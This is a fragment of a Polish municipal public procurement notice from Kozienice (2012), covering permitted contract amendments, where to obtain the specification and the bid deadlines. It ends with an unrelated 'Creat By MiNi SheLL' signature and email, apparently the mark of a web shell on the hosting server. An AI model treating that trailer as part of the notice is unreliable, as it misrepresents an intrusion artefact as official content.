              działania nie są konsekwencją winy którejkolwiek ze stron.
1.8.Zawieszenie wykonania prac nie spowodowanych uchybieniami Wykonawcy,
2.W przypadku zaistnienia potrzeby zmiany rozwiązań technicznych gdy proponowane 
rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego 
w projekcie,
3.Gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia 
        umowy i na które strony nie miały wpływu,
4.W przypadku zaistnienia uzasadnionej potrzeby zmiany podwykonawcy. 
Jeżeli wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy, zmiana podwykonawcy możliwa jest pod warunkiem gdy nowy podwykonawca wykaże spełnianie warunków udziału w postępowaniu w zakresie wskazanym na etapie postępowania o zamówienie publiczne, przedkładając wymagane dokumenty. 
5.Gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania 
           umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku  
           akcyzowego.
6.Gdy nastąpi zmiana przepisów prawnych mających wpływ na realizacje umowy, w 
                                       szczególności na jej zakres,termin.
7.Gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.
Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną w formie pisemnego aneksu - pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, 26-900 Kozienice. ul. Parkowa 5, pok. nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2012 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, 26-900 Kozienice. ul. Parkowa 5, pok. nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com